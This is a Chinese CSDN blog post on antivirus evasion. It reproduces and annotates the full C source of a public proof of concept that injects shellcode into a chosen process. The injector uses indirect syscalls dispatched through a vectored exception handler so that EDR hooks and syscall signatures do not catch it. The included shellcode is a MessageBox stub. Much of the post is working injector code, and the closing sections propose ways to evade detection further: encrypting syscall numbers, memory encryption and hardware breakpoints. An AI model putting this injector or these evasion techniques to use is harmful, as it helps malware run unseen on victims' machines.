免杀笔记 ---> 一种有想法的Indirect-Syscall

已于 2024-09-25 01:59:07 修改
阅读量1k 收藏 13
点赞数 11
文章标签: 免杀 绕AV 间接系统调用
于 2024-09-25 01:58:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/142503593
版权

今天来分享一下,看到的一种Indirect-Syscall,也是两年前的项目了,但是也是能学到思路,从中也是能感受到杀软对抗之间的乐趣!!说到乐趣,让我想起看到过一位大佬的文章对"游褒禅山记"的段落引用,这里也深有同感,或许乐趣就在其中吧!!

而世之奇伟、瑰怪,非常之观,常在于险远,而人之所罕至焉,故非有志者不能至也! 

目录

1.Veh异常的引入 

2.项目魔改方向

1.动态获取SSN

2.Veh的判断 && SSN的加密

3.增加内存对抗

1.Veh异常的引入 

上一篇Blog讲到过很多Syscall,其中,有人发布了一种新颖的syscall的方式,也是通过Jmp去Ntdll实现的间接系统调用,但是这里引入了Veh。项目地址RedTeamOperations/VEH-PoC (github.com)icon-default.png?t=O83Ahttps://github.com/RedTeamOperations/VEH-PoC/tree/main源代码如下

#pragma once
#include <Windows.h>
#include <stdio.h>
#include "incl.h"



EXTERN_C DWORD64 SetSysCall(DWORD offset);

BYTE* FindSyscallAddr(ULONG_PTR base) {
	BYTE* func_base = (BYTE*)(base);
	BYTE* temp_base = 0x00;
	//0F05 syscall
	while (*func_base != 0xc3) {
		temp_base = func_base;
		if (*temp_base == 0x0f) {
			temp_base++;
			if (*temp_base == 0x05) {
				temp_base++;
				if (*temp_base == 0xc3) {
					temp_base = func_base;
					break;
				}
			}
		}
		else {
			func_base++;
			temp_base = 0x00;
		}
	}
	return temp_base;
}


ULONG_PTR g_syscall_addr = 0x00;
ULONG HandleException(PEXCEPTION_POINTERS exception_ptr) {
	// EXCEPTION_ACCESS_VIOLATION check is not stable, some situation like during loading library 
	// might cause EXCEPTION_ACCESS_VIOLATION 
	// TODO: Add more checks for stability
	if (exception_ptr->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
		// Todo: decode syscall number in Rip if encoded
		// modifing the registers
		exception_ptr->ContextRecord->R10 = exception_ptr->ContextRecord->Rcx;
		// RIP holds the syscall number
		exception_ptr->ContextRecord->Rax = exception_ptr->ContextRecord->Rip;
		// setting global address
		exception_ptr->ContextRecord->Rip = g_syscall_addr;
		return EXCEPTION_CONTINUE_EXECUTION;
	}
	
}

void VectoredSyscalPOC(unsigned char payload[], SIZE_T payload_size, int pid) {
	ULONG_PTR syscall_addr = 0x00;
	FARPROC drawtext = GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwDrawText");
	if (drawtext == NULL) {
		printf("[-] Error GetProcess Address\n");
		exit(-1);
	}
	syscall_addr = (ULONG_PTR)FindSyscallAddr((ULONG_PTR)drawtext);

	if (syscall_addr == NULL) {
		printf("[-] Error Resolving syscall Address\n");
		exit(-1);
	} 
	// storing syscall address globally
	g_syscall_addr = syscall_addr;

	 Init vectored handle
	AddVectoredExceptionHandler(TRUE, (PVECTORED_EXCEPTION_HANDLER)HandleException);

	NTSTATUS status;
	// Note: Below syscall might differ system to system 
	// it's better to grab the syscall numbers dynamically
	
	enum syscall_no {
		SysNtOpenProcess = 0x26,
		SysNtAllocateVirtualMem = 0x18,
		SysNtWriteVirtualMem = 0x3A,
		SysNtProtectVirtualMem = 0x50,
		SysNtCreateThreadEx = 0xBD
	};

	
	// Todo: encode syscall numbers
	// init Nt APIs
	// Instead of actual Nt API address we'll set the API with syscall number
	// and calling each Nt APIs causes an exception which'll be later handled from the
	// registered vectored handler. The reason behind initializing each NtAPIs with
	// their corresponding syscall number is to pass the syscall number to the 
	// exception handler via RIP register 

	_NtOpenProcess pNtOpenProcess = (_NtOpenProcess)SysNtOpenProcess;
	_NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)SysNtAllocateVirtualMem;
	_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)SysNtWriteVirtualMem;
	_NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)SysNtProtectVirtualMem;
	_NtCreateThreadEx pNtCreateThreadEx = (_NtProtectVirtualMemory)SysNtCreateThreadEx;


	HANDLE hProcess = { INVALID_HANDLE_VALUE };
	HANDLE hThread = NULL;
	HMODULE pNtdllModule = NULL;
	CLIENT_ID clID = { 0 };
	DWORD mPID = pid;
	OBJECT_ATTRIBUTES objAttr;
	PVOID remoteBase = 0;
	SIZE_T bytesWritten = 0;
	SIZE_T regionSize = 0;
	unsigned long oldProtection = 0;
	// Getting handle to module
	//printf("loaded syscall before detect\n");
	//system("pause");
	// Init Object Attributes
	InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
	clID.UniqueProcess = (void*)mPID;
	clID.UniqueThread = 0;
	if (!LoadLibraryA("syscall-detect.dll")) {
		printf("Failed to load library \n");
	}
	printf("[+] Starting Vectored Syscall... \n");
	system("pause");
	//printf("loaded syscall detect\n");
	// open handle to target process
	status = pNtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clID);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to Open Process: %x \n", status);
		exit(-1);
	}

	// Allocate memory in remote process
	regionSize = payload_size;
	status = pNtAllocateVirtualMemory(hProcess, &remoteBase, 0, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!NT_SUCCESS(status)) {
		printf("[-] Remote Allocation Failed: %x \n", status);
		exit(-1);
	}

	// Write payload to remote process
	status = pNtWriteVirtualMemory(hProcess, remoteBase, payload, payload_size, &bytesWritten);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to write payload in remote process: %x \n", status);
		exit(-1);
	}

	// Change Memory Protection: RW -> RX
	status = pNtProtectVirtualMemory(hProcess, &remoteBase, &regionSize, PAGE_EXECUTE_READ, &oldProtection);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to change memory protection from RW to RX: %x \n", status);
		exit(-1);
	}

	// Execute Remote Thread
	status = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteBase, NULL, FALSE, 0, 0, 0, NULL);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to Execute Remote Thread: %x \n", status);
		exit(-1);
	}

	printf("[+] Injected shellcode!! \n");
	system("pause");
}


int main(int argc, char** argv) {
	// parsing argument
	int pid = 0;
	if (argc < 2 || argc > 2) {
		printf("[!] filename.exe <PID> \n");
		exit(-1);
	}
	pid = atoi(argv[1]);

	// MessageBox "hello world"
	unsigned char payload[] = "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
		"\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
		"\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
		"\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
		"\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
		"\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
		"\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
		"\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
		"\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
		"\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
		"\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
		"\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
		"\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
		"\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
		"\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
		"\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
		"\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
		"\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
		"\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
		"\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
		"\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
		"\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
		"\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
		"\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
		"\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
		"\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
		"\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
		"\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
		"\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
	// Size of paylaod
	SIZE_T payload_size = sizeof(payload);
	// Invoke Classic Process Injection
	VectoredSyscalPOC(payload, payload_size, pid);
}

其中这个syscall的一个特色就是它的Veh了,下面我们逐行代码解析

前面不多说的,我们直接跟进VectoredSyscalPOC 这个函数

VectoredSyscalPOC(payload, payload_size, pid);

首先通过找到ZwDrawText这个Zw函数的系统调用

	ULONG_PTR syscall_addr = 0x00;
	FARPROC drawtext = GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwDrawText");
	if (drawtext == NULL) {
		printf("[-] Error GetProcess Address\n");
		exit(-1);
	}
	syscall_addr = (ULONG_PTR)FindSyscallAddr((ULONG_PTR)drawtext);

	if (syscall_addr == NULL) {
		printf("[-] Error Resolving syscall Address\n");
		exit(-1);
	}

因为就算是天擎这种这么喜欢HookNt函数的也不hook这个冷门函数 

我们跟进去FindSyscallAddr 这个函数

syscall_addr = (ULONG_PTR)FindSyscallAddr((ULONG_PTR)drawtext);

这个就是在再通过不断移动func_base的地址,来找到drawtext它syscall的地址 

BYTE* FindSyscallAddr(ULONG_PTR base) {
	BYTE* func_base = (BYTE*)(base);
	BYTE* temp_base = 0x00;
	//0F05 syscall
	while (*func_base != 0xc3) {
		temp_base = func_base;
		if (*temp_base == 0x0f) {
			temp_base++;
			if (*temp_base == 0x05) {
				temp_base++;
				if (*temp_base == 0xc3) {
					temp_base = func_base;
					break;
				}
			}
		}
		else {
			func_base++;
			temp_base = 0x00;
		}
	}
	return temp_base;
}

接着就是异常处理函数的引入了

AddVectoredExceptionHandler(TRUE, (PVECTORED_EXCEPTION_HANDLER)HandleException);

这里我们先不跟进去(我个人觉得会更好理解),我们继续往下看

	
	enum syscall_no {
		SysNtOpenProcess = 0x26,
		SysNtAllocateVirtualMem = 0x18,
		SysNtWriteVirtualMem = 0x3A,
		SysNtProtectVirtualMem = 0x50,
		SysNtCreateThreadEx = 0xBD
	};

	
	// Todo: encode syscall numbers
	// init Nt APIs
	// Instead of actual Nt API address we'll set the API with syscall number
	// and calling each Nt APIs causes an exception which'll be later handled from the
	// registered vectored handler. The reason behind initializing each NtAPIs with
	// their corresponding syscall number is to pass the syscall number to the 
	// exception handler via RIP register 

	_NtOpenProcess pNtOpenProcess = (_NtOpenProcess)SysNtOpenProcess;
	_NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)SysNtAllocateVirtualMem;
	_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)SysNtWriteVirtualMem;
	_NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)SysNtProtectVirtualMem;
	_NtCreateThreadEx pNtCreateThreadEx = (_NtProtectVirtualMemory)SysNtCreateThreadEx;

这里就是把上面的SSN分别给了每一个nt函数的地址(是不是有点奇怪,别急!好戏开场!)

	status = pNtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clID);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to Open Process: %x \n", status);
		exit(-1);
	}

	// Allocate memory in remote process
	regionSize = payload_size;
	status = pNtAllocateVirtualMemory(hProcess, &remoteBase, 0, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!NT_SUCCESS(status)) {
		printf("[-] Remote Allocation Failed: %x \n", status);
		exit(-1);
	}

	// Write payload to remote process
	status = pNtWriteVirtualMemory(hProcess, remoteBase, payload, payload_size, &bytesWritten);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to write payload in remote process: %x \n", status);
		exit(-1);
	}

	// Change Memory Protection: RW -> RX
	status = pNtProtectVirtualMemory(hProcess, &remoteBase, &regionSize, PAGE_EXECUTE_READ, &oldProtection);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to change memory protection from RW to RX: %x \n", status);
		exit(-1);
	}

	// Execute Remote Thread
	status = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteBase, NULL, FALSE, 0, 0, 0, NULL);
	if (!NT_SUCCESS(status)) {
		printf("[-] Failed to Execute Remote Thread: %x \n", status);
		exit(-1);
	}

然后就是分别调用这些NT函数(shellcode注入),但是他们调用的地址都是非法的,所以就会引发异常!!!😋😋

这时候我们再去跟进异常处理函数

ULONG_PTR g_syscall_addr = 0x00;
ULONG HandleException(PEXCEPTION_POINTERS exception_ptr) {
	// EXCEPTION_ACCESS_VIOLATION check is not stable, some situation like during loading library 
	// might cause EXCEPTION_ACCESS_VIOLATION 
	// TODO: Add more checks for stability
	if (exception_ptr->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
		// Todo: decode syscall number in Rip if encoded
		// modifing the registers
		exception_ptr->ContextRecord->R10 = exception_ptr->ContextRecord->Rcx;
		// RIP holds the syscall number
		exception_ptr->ContextRecord->Rax = exception_ptr->ContextRecord->Rip;
		// setting global address
		exception_ptr->ContextRecord->Rip = g_syscall_addr;
		return EXCEPTION_CONTINUE_EXECUTION;
	}
	
}

我们就突然熟悉了!!!  所以我手动加了一个注释🤠

//This Stub Should Look Like
//mov  r10 , rcx 
//mov  eax , ssn 
//jmp  ntdll!syscallAddr

因为异常处理函数中,我们能获取到它发生异常的地址,而碰巧,我们就调用nt函数的时候这个地址,正好被换成了我们的ssn!! 所以我们的 exception_ptr->ContextRecord->Rip 就是SSN,这里是我认为非常巧妙的一个点!

然后把程序的Rip指向我们之前找到的drawtext它syscall的地址,正正好好的完成了我们的IndirectSyscall!!!

而他的另外一个很大的优点是什么!!

 :它不用构造特定的Stub,或者说不会出现Syscall,Jmp或者说考虑SysWhisper3的egg这种操作,也是可以规避了Syscall的特征检测!!

2.项目魔改方向

1.动态获取SSN

在这份代码中,SSN是作者直接写死了的,于是作者也加了这样的一个注释

	// Note: Below syscall might differ system to system 
	// it's better to grab the syscall numbers dynamically

我们可以动态获取SSN,这种方式已在大部分Syscall项目中实现

2.Veh的判断 && SSN的加密

这个是作者认为可以改进的地方,也是在代码中抛出的

	// EXCEPTION_ACCESS_VIOLATION check is not stable, some situation like during loading library 
	// might cause EXCEPTION_ACCESS_VIOLATION 
	// TODO: Add more checks for stability

这里是作者前面进行了LoadLibrary的操作,担心导致0xc000005,这里可以加上判断异常地址的值通过算法计算是否是加密的SSN! 因为这里作者也是提到了SSN可以进行一个加密的操作


	// Todo: encode syscall numbers
	// init Nt APIs
	// Instead of actual Nt API address we'll set the API with syscall number
	// and calling each Nt APIs causes an exception which'll be later handled from the
	// registered vectored handler. The reason behind initializing each NtAPIs with
	// their corresponding syscall number is to pass the syscall number to the 
	// exception handler via RIP register

所以我们可以对SSN进行加密,然后我们后面 mov eax ,ssn 的操作就可以变成这样

exception_ptr->ContextRecord->Rax = Decrypt(exception_ptr->ContextRecord->Rip);

3.增加内存对抗

现在的对抗趋势,已经逐渐往内存对抗上去进行(如某绒新增的内存查杀可把某些人杀的不浅),所以我们也是可以进行内存动态加解密,但是这里可以配合一种无痕的Hook技术 "硬件断点",这个后续也会进行更新。 

主要是通过Inline-Hook需要修改内存,如果以后的AV || EDR 增加"内存巡检",那么我们的Patch内存将会是一种灾难,甚至会导致直接查杀,但是即使是硬件断点,也是可以被检测!但是还是那句话,"道高一丈,魔高一尺",或许杀软对抗的乐趣就在其中吧!!! :>) 

WanKING~~
关注
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值